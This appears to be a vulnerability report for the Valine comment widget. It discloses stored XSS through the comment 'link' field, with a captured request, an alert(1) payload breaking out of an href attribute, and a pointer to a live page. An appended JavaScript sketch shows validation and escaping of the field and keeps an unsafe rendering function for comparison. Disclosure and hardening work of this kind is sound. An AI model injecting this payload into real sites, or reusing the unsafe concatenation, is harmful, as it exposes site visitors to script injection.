If you want to report a bug, please provide the following information:
{"comment":"1\n","nick":"test","mail":"test@163.com","link":"\" ></a><img src=x onerror=alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/faq.html","QQAvatar":"","ip":"2406:da14:727:6700:2746:774b:2b87:6dbe","insertedAt":{"__type":"Date","iso":"2021-06-03T15:59:08.981Z"},"ACL":{"*":{"read":true}}}
The core payload is the comment content: \" ></a><img src=x onerror=alert(1)> Its effect can be seen at: https://valine.js.org/faq.html
https://github.com/xCss/Valine/releases/tag/v1.4.15
XSS vulnerability in the comment link
Submit a comment using Burp Suite and capture the request
poc:
https://valine.js.org/faq.html Remember to delete the comment
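A defensive sketch of handling the `link` field from the report above, added here as an example and not taken from Valine's code: the commenter-supplied link is accepted only if it parses as an absolute http(s) URL, and it is attribute-escaped before it reaches `href`. The function names, the markup, and the unsafe concatenation shown for comparison are assumptions made for illustration.

```javascript
// Added example, not Valine's code. All names and markup are hypothetical.

// The "link" value from the report's JSON body, after JSON unescaping.
const ISSUE_PAYLOAD = '" ></a><img src=x onerror=alert(1)>';

// Escape characters that can end an attribute value or open a tag.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Return a normalized http(s) URL, or '' when the input is not acceptable.
function safeLink(raw) {
  if (typeof raw !== 'string') return '';
  const trimmed = raw.trim();
  // Reject markup, quotes, whitespace and control characters outright.
  if (/[\s"'<>`\\\u0000-\u001f]/.test(trimmed)) return '';
  let url;
  try {
    url = new URL(trimmed); // throws on relative or malformed input
  } catch (e) {
    return '';
  }
  // Scheme allowlist: blocks javascript:, data:, vbscript: and the rest.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '';
  return url.href;
}

// Hardened rendering: link the nick only when the link validates.
function renderNick(nick, link) {
  const name = escapeAttr(nick);
  const href = safeLink(link);
  if (!href) return `<span class="nick">${name}</span>`;
  return `<a class="nick" rel="nofollow noopener" href="${escapeAttr(href)}">${name}</a>`;
}

// Assumed vulnerable pattern for comparison: raw concatenation into href.
function renderNickUnsafe(nick, link) {
  return '<a class="nick" href="' + link + '">' + nick + '</a>';
}

console.log(renderNickUnsafe('test', ISSUE_PAYLOAD)); // img tag escapes the attribute
console.log(renderNick('test', ISSUE_PAYLOAD));       // plain span, no link
```

Validation belongs on the server side or in the storage layer as well, since the report submits the request directly with an intercepting proxy and never passes through client-side form checks.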